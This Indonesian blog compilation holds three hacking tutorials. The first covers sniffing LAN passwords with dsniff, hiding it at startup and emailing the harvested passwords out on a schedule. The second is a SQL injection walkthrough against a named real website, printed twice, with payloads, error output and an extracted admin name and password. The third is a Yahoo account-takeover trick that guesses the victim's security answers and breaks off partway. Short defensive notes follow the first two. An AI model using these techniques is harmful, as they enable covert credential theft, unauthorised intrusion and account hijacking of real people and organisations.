Baru mulai tertarik masalah keamanan? Pingin ngebuktiin ketidakamanan jaringan lokal kepada admin? Atas permintaan umum (dan seringnya teman-teman admin nanyain tentang sniffing), berikut adalah cara cepat (kurang lebih 15 sampai 30 menit) memanen password dengan menggunakan teknik yang sangat awam: ethernet sniffing. Tentunya akan dibahas juga cara-cara pendeteksian dan pemberantasannya.
Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan.
Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet (beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.
dsniff aslinya adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di
jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca.
Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere NAI Sniffer, Microsoft SMB, dan Oracle SQL*Net auth info.
Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.
Bahan-bahan/Persyaratan:
--------------------------------
LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz
(gunakan WinZip untuk nge-extract file-file .exe-nya)
Cara Memasak
------------------
- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet "Next","Next","Finish")
- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:> tinggal ketik "dsniff".
- silakan menonton password-password milik pengguna ditampilkan di layar
Catatan:
----------
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".
Pengembangan lebih lanjut
---------------------------------
Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db"
untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"
contoh: "C:\WINDOWS\DS>dsniff -r password.db"
secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
"C:\WINDOWS\DS>dsniff -r password.db > panen.txt",
panen.txt siap disajikan.
Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html. Simpan program ini di
C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db
(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)
Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan.
Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file.
Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja (dengan perintah "dsniff -r password.db > panen.txt" lalu "notepad panen.txt").
Membuat sadapan lebh portabel
-----------------------------
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP) wpcap.vxd packet.dll
simpan file-file ini ke disket (A:), dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil :).
Tambahan-tambahan
-----------------
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu).
Silahkan anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya. Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi
Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch"
yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").
Deteksi, Pencegahan, dan Penanggulangan
---------------------------------------
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada aktifitas-aktifitas mencurigakan.
Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.
Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).
Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu periksa keadaan hard disk anda.
Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).
Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid.
Friday, September 17, 2010
SQL Injection, step by stepSQL Injection, step by step
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Wednesday, September 15, 2010
TricK s0zenK
sebelumnya social engineering sebagai teknik dan seni mendapatkan informasi dari personal
dengan cara mengelabui tanpa perlu melakukan hal-hal yang biasa dilakukan seorang cracker. Ada pula
yang mengatakan sebagai psychological tricks terhadap orang yang memiliki hak akses pada suatu sistem
sebagai upaya untuk mengambil informasi yang dibutuhkan. Atau bisa dianggap sebagai seni
memanfaatkan kelemahan-kelemahan manusia seperti sikap tak acuh, naif atau keinginan natural manusia
yang ingin disukai orang lain.
daripada bengong saia coba menuliskan bagaimana take0ver facebook dengan memanfaatkan kelemahan user
lalu bagaimana caranya Tuan Muda????heee..sering dapat pertanyaan gitu saia.,baiklah.,.,.m0ga sajja dengan tulisan ini bisa terjawab.AMIN
yang pertama cari email target..usahakan yahoo dech..hihihi
lalu masuk ke yahoo truz klik I can't acces my account atau saya tidak dapat mengakses email saya
truz akan muncul pilihan masalah apa yang anda hadapi..yuhu.,.yahoo munk baik bgd yak.,.^_^
klik next sajjah lach.,lalu diminta memasukan email alternatif.,.wew.,.biLang az ga punya,,heee
s0 pilih yang bawah atau saia tidak dapat mengakses email alternatif saia juga.,hahahaha
nach..masukan email target tadi lalu masukan juga scurity c0dex..truz next lg...
wew,,,hehehee..ujian dimulai...ay0 jawab pertanyaan scurity dari target kita..hahay,,
ada bermacam pertanyaan yang di tawarkan yahoo..
apabila user menggunakan pertanyaan default dari yahoo maka hal ini bisa memudahkan kita dalam memasuki paksa emailx.,.
biasanya pertanyaan yang muncul
1. dimanakah anda berbulan madu???
berdasarkan hasiL survey & pengalaman rata-rata user menjawab
bali
lombok
jepang
venezuela
rumah
dirumah
dan lain-lain.,.hihihi...kal0 tetap gagaL bisa cek kota asal target kita di inf0 facebookx..coba az dimasukan biasanya berhasiL
2. tanggal lahir & k0de pos..???
ini lebih gampang lagi karena biasanya di inf0 facebookx user juga membiarkan tanggal lahir terlihat begitu sajja..heee
*lalu kede posx Tuan?????
itu bisa di atasi...buka az situs pos ind0nesia..hahahahhaaa.,.masukan kota target kL0 ada alamat rumahx.,.lebih gampang lg..hikz.,.nanti dikasih tw sm pak p0s onlinex
3. siapa nama belakang paman kesayangan anda???
